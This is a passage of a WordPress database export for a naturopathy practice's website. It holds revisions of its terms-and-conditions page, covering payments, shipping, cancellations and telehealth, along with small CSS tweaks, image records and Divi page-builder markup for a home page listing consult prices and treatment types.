style=\"font-family: Montserrat;\">It is important you do not take any other supplements during the course of our treatment without first disclosing to us; this is to ensure no interactions will occur.</span></p>\n<p> </p>\n<h2><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal;\"><strong>Payment Terms</strong></span></h2>\n<p><span style=\"font-family: Montserrat;\">Payment for face-to-face consults is required at the completion of the appointment. A 50% deposit is required for online consults at the time of booking. Should you need to cancel your booking, this will be refunded if more than 24 hours’ notice is provided. The deposit is forfeited if the booking is cancelled with less than 24 hours’ notice.</span></p>\n<p><span style=\"font-family: Montserrat;\">Payments are taken via Stripe or Paypal. Please view their websites directly for their respective privacy policies.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Shipping</span></strong></span></h3>\n<p>Online consults: Shipping for personalised herbal tinctures, flower essences, teas and creams that we personally make up for you, will be free of charge when prescribed through a consult. If any repeats of herbal tinctures, flower essences, teas and creams that we personally make up for you are sold without a consult, you will be liable for shipping costs.</p>\n<p>A flat-rate shipping fee of $10 is charged. Alternatively, you may wish to pick up your prescription from Kalamunda free of charge.</p>\n<p>All consults: If a prescription is generated for you through online dispensary vital.ly (www.vital.ly), postage will be set at their prices, which can range from $6.90 to $12.50. Please refer to vital.ly delivery terms and prices directly on their site. If you have any questions regarding this, please contact us.</p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Order fulfilment through vital.ly</span></strong></span></h3>\n<p>Often, products will be out of stock through the online dispensary service that we use. If this occurs, please contact us and we will endeavour to find a suitable replacement product.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Online Consultations</strong></span></h4>\n<p>Online consults will be conducted securely via Cliniko Telehealth - <a href=\"https://help.cliniko.com/en/articles/3843932-telehealth-a-guide-for-patients\"><span style=\"color: #000000;\">please read through this info BEFORE</span></a> your scheduled appointment time to ensure our consult runs smoothly. You will receive an appointment link shortly after booking. You will also receive a Client Intake form that will need to be completed at least 48hrs before the appointment.<br />On the day of the appointment, click the Telehealth link 10-15 minutes before the start time to make sure your computer can access the link correctly and your microphone and video are in good working order.<br />For privacy reasons, the consult will not be recorded, and we ask that you not record it either. Please ensure you are in a quiet place with minimal interruptions to allow the consult to flow freely. If internet issues causes the consult to cut out, we will continue our consultation via phone call. Any time delay between contact will be added on to the total consult time so there is no loss of time.</p>\n<p> </p>\n<h3><strong><span style=\"font-family: \'Playfair Display SC\';\">Change of mind</span></strong></h3>\n<p>We do not offer a refund for change of mind for any services so please choose carefully. Please note that in order to provide safe and effective remedy prescriptions, we do not accept any product returns for refund as we cannot ascertain how the product was stored.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Cancellations and Reschedules</strong></span></h4>\n<p>Please respect our time and other clients who may wish to book your time slot by cancelling or rescheduling your appointment 24 hours or more in advance where possible. You will be sent a reminder text or email the day before your appointment to assist in the smooth running of the practice schedule.</p>\n<p>Clients are able to cancel or reschedule an appointment at anytime, without incurring a fee, provided <em><u>24 hours notice</u></em> is given where practicable. This allows the opportunity to offer the session to another client. If you cancel with less than 24 hours notice, you may be charged a <u>Late Cancellation Fee</u> equal to 50% of the full session fee. It is important to note that third parties, (ie Worksafe) will not pay for missed appointments, so you will be responsible for the entire Late Cancellation Fee.</p>\n<p>Extenuating circumstances may be considered and it is at the sole discretion of Verde Naturopathy whether or not to waive part or all of your booking fee as stated above.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>No-shows</strong></span></h4>\n<p>No-shows incur a 100% cost of your appointment fee. In fairness to other clients, we deem it unreasonable to continue offering sessions to those who regularly miss or cancel their appointments at late notice and as such, <u>after 2 unattended appointments</u> you will be required to pay the <u>full session fee</u> at the time of booking to secure a new appointment.</p>\n<p>Your understanding of this policy is appreciated.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Confidentiality and Privacy</strong></span></h4>\n<p>Please view our <span style=\"color: #000000;\"><a href=\"https://verdenaturopathy.com.au/privacy-policy/\" style=\"color: #000000;\">privacy policy</a> </span>for more details.</p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','T&C','','inherit','closed','closed','','2-revision-v1','','','2021-05-27 13:32:52','2021-05-27 05:32:52','',2,'https://verdenaturopathy.com.au/?p=221',0,'revision','',0),(236,1,'2021-05-27 20:42:54','2021-05-27 12:42:54','@media screen and (min-width: 1040px) {\n #et-top-navigation {\n \n float:none;\n \n \n }\n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-27 20:42:54','2021-05-27 12:42:54','',84,'https://verdenaturopathy.com.au/?p=236',0,'revision','',0),(227,1,'2021-05-27 20:22:12','2021-05-27 12:22:12','@media screen and (min-width: 1040px) {\n #et-top-navigation {\n display: inline-block!important;\n float: none!important;\n \n }\n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-27 20:22:12','2021-05-27 12:22:12','',84,'https://verdenaturopathy.com.au/?p=227',0,'revision','',0),(224,1,'2021-05-27 20:10:38','2021-05-27 12:10:38','@media screen and (min-width: 1040px) {\r\n #et-top-navigation {\r\n display: inline-block!important;\r\n float: none!important;\r\n width: calc(100% - 230px)!important;\r\n }\r\n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-27 20:10:38','2021-05-27 12:10:38','',84,'https://verdenaturopathy.com.au/?p=224',0,'revision','',0),(223,1,'2021-05-27 14:01:07','2021-05-27 06:01:07','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" inline_fonts=\"Playfair Display SC,Playfair Display,Montserrat\"]<!-- divi:paragraph -->\n<h1 style=\"text-align: center;\"><span style=\"font-family: \'Playfair Display SC\';\"><strong> Terms & Conditions</strong></span></h1>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\">Please be aware that any information we provide on this website, in blogs and in downloadable resources is general advice only. This information may not apply or could potentially be harmful to people in specific circumstances, so please seek medical advice before acting on this information to ensure your own safety, particularly if you have a medical condition or take any medications. There is no professional relationship formed unless you explicitly choose to work with us by purchasing our services or products.</span></p>\n<p><span style=\"font-family: Montserrat;\">Your health and safety are important to us. We expect you to use common sense when accessing the information on or downloaded from this website. Please contact us if you have any doubts or questions about the suitability of any general, nutritional, herbal or lifestyle advice provided on this website.</span></p>\n<p> </p>\n<h2><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\" font-family:=\"\" playfair=\"\" display=\"\" sc=\"\">Our Responsibility</span></strong></span></h2>\n<p><span style=\"font-family: Montserrat;\">Melissa Cann is a fully-qualified naturopath holding a Bachelor’s degree in Health Science (Naturopathy). This allows her to provide naturopathic services and dispense practitioner-only products. Naturopaths provide consultations which include thorough case-taking, physical examinations and the dispensing of products. Treatment plans may include natural remedies such as liquid herbs, flower essences, herbal infusions/teas, herbal creams and supplements, as well as dietary advice and meal planning, and lifestyle recommendations.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Your responsibility</span></strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Your health & safety is our priority & therefore we ask that you fill out a <u>Client Intake Form</u> prior to treatment. All information you provide will be confidential. Failure to complete this form will result in our inability to treat you in the interest of your health & safety. The information gathered during a medical history will assist in establishing this and developing the best treatment plan for you. </span></p>\n<p><span style=\"font-family: Montserrat;\">During a consult, we will discuss your presenting complaint and health history in order to make the safest and most effective treatment plan for you. To get a thorough picture, we require lots of information regarding symptoms, illnesses, body systems and processes, mental health, current living situation and family history. Current medications and supplements must be disclosed so as to ensure no interactions will occur between what we prescribe and what you are currently taking.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is your responsibility to inform us of any changes in your health status throughout your future treatments with us.</span></p>\n<p><span style=\"font-family: Montserrat;\">Please notify us immediately if you experience any worsening of symptoms or any unpleasant or unwanted side effects or reactions after commencing each new or recurring herbal medicine liquid, supplement or other treatment. Reactions may indicate a sensitivity or allergy to a herb so it is your responsibility to notify us immediately so we can rectify the issue. If a severe reaction occurs, please cease taking the prescribed remedy and seek medical advice immediately.</span></p>\n<p><span style=\"font-family: Montserrat;\">If you feel you have not provided accurate information during the consult, please contact us directly to rectify. Incorrect personal/health information provided may impact your treatment success and/or personal safety.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is important you do not take any other supplements during the course of our treatment without first disclosing to us; this is to ensure no interactions will occur.</span></p>\n<p> </p>\n<h2><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal;\"><strong>Payment Terms</strong></span></h2>\n<p><span style=\"font-family: Montserrat;\">Payment for face-to-face consults is required at the completion of the appointment. </span></p>\n<p><span style=\"font-family: Montserrat;\">Payment for online consults is <strong>required at the time of booking </strong>through online payment system Stripe. Should you need to cancel your booking, the full consult fee will be refunded <span style=\"text-decoration: underline;\"><em>if more than 24 hours’ notice is provided</em></span>. If you cancel with <span style=\"text-decoration: underline;\"><em>less than 24 hours notice,</em></span> 50% of the consult fee will be taken and the remainder refunded to you. <span style=\"text-decoration: underline;\">No-show online consults will forfeit their full consult fee</span>.</span></p>\n<p><span style=\"font-family: Montserrat;\">Payments are taken via Stripe or Paypal. Please view their websites directly for their respective privacy policies.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Shipping</span></strong></span></h3>\n<p>Online consults: Shipping for personalised herbal tinctures, flower essences, teas and creams that we personally make up for you, will be free of charge when prescribed through a consult. If any repeats of herbal tinctures, flower essences, teas and creams that we personally make up for you are sold without a consult, you will be liable for shipping costs.</p>\n<p>A flat-rate shipping fee of $10 is charged. Alternatively, you may wish to pick up your prescription from Kalamunda free of charge.</p>\n<p>All consults: If a prescription is generated for you through online dispensary vital.ly (www.vital.ly), postage will be set at their prices, which can range from $6.90 to $12.50. Please refer to vital.ly delivery terms and prices directly on their site. If you have any questions regarding this, please contact us.</p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Order fulfilment through vital.ly</span></strong></span></h3>\n<p>Often, products will be out of stock through the online dispensary service that we use. If this occurs, please contact us and we will endeavour to find a suitable replacement product.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Online Consultations</strong></span></h4>\n<p>Online consults will be conducted securely via Cliniko Telehealth - <a href=\"https://help.cliniko.com/en/articles/3843932-telehealth-a-guide-for-patients\"><span style=\"color: #000000;\">please read through this info BEFORE</span></a> your scheduled appointment time to ensure our consult runs smoothly. You will receive an appointment link shortly after booking. You will also receive a Client Intake form that will need to be completed at least 48hrs before the appointment.<br />On the day of the appointment, click the Telehealth link 10-15 minutes before the start time to make sure your computer can access the link correctly and your microphone and video are in good working order.<br />For privacy reasons, the consult will not be recorded, and we ask that you not record it either. Please ensure you are in a quiet place with minimal interruptions to allow the consult to flow freely. If internet issues causes the consult to cut out, we will continue our consultation via phone call. Any time delay between contact will be added on to the total consult time so there is no loss of time.</p>\n<p> </p>\n<h3><strong><span style=\"font-family: \'Playfair Display SC\';\">Change of mind</span></strong></h3>\n<p>We do not offer a refund for change of mind for any services so please choose carefully. Please note that in order to provide safe and effective remedy prescriptions, we do not accept any product returns for refund as we cannot ascertain how the product was stored.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Cancellations and Reschedules</strong></span></h4>\n<p>Please respect our time and other clients who may wish to book your time slot by cancelling or rescheduling your appointment 24 hours or more in advance where possible. You will be sent a reminder text or email the day before your appointment to assist in the smooth running of the practice schedule.</p>\n<p>Clients are able to cancel or reschedule an appointment at anytime, without incurring a fee, provided <em><u>24 hours notice</u></em> is given where practicable. This allows the opportunity to offer the session to another client. If you cancel with <em><span style=\"text-decoration: underline;\">less than 24 hours notice,</span></em> you may be charged a <u>Late Cancellation Fee</u> equal to 50% of the full session fee. It is important to note that third parties, (ie Worksafe) will not pay for missed appointments, so you will be responsible for the entire Late Cancellation Fee.</p>\n<p>Extenuating circumstances may be considered and it is at the sole discretion of Verde Naturopathy whether or not to waive part or all of your booking fee as stated above.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>No-shows</strong></span></h4>\n<p>No-shows incur a 100% cost of your appointment fee. In fairness to other clients, we deem it unreasonable to continue offering sessions to those who regularly miss or cancel their appointments at late notice and as such, <u>after 2 unattended appointments</u> you will be required to pay the <u>full session fee</u> at the time of booking to secure a new appointment.</p>\n<p>Your understanding of this policy is appreciated.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Confidentiality and Privacy</strong></span></h4>\n<p>Please view our <span style=\"color: #000000;\"><a href=\"https://verdenaturopathy.com.au/privacy-policy/\" style=\"color: #000000;\">privacy policy</a> </span>for more details.</p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','T&C','','inherit','closed','closed','','2-revision-v1','','','2021-05-27 14:01:07','2021-05-27 06:01:07','',2,'https://verdenaturopathy.com.au/?p=223',0,'revision','',0),(252,1,'2021-05-27 21:21:47','2021-05-27 13:21:47','<!-- wp:divi/placeholder /-->','Bookings','','inherit','closed','closed','','48-revision-v1','','','2021-05-27 21:21:47','2021-05-27 13:21:47','',48,'https://verdenaturopathy.com.au/?p=252',0,'revision','',0),(242,1,'2021-05-27 20:57:05','2021-05-27 12:57:05','','2-01','','inherit','open','closed','','2-01-2','','','2021-05-27 20:57:05','2021-05-27 12:57:05','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01-1.png',0,'attachment','image/png',0),(243,1,'2021-05-27 21:03:31','2021-05-27 13:03:31','','IMG_20210503_205936_105','','inherit','open','closed','','img_20210503_205936_105','','','2021-05-27 21:03:31','2021-05-27 13:03:31','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg',0,'attachment','image/jpeg',0),(245,1,'2021-05-27 21:12:08','2021-05-27 13:12:08','','IMG_20200714_175859_865','','inherit','open','closed','','img_20200714_175859_865','','','2021-05-27 21:12:08','2021-05-27 13:12:08','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg',0,'attachment','image/jpeg',0),(244,1,'2021-05-27 21:07:26','2021-05-27 13:07:26','','IMG_20200718_210412_679','','inherit','open','closed','','img_20200718_210412_679','','','2021-05-27 21:07:26','2021-05-27 13:07:26','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200718_210412_679.jpg',0,'attachment','image/jpeg',0),(259,1,'2021-05-27 21:29:39','2021-05-27 13:29:39','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online telehealth consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional 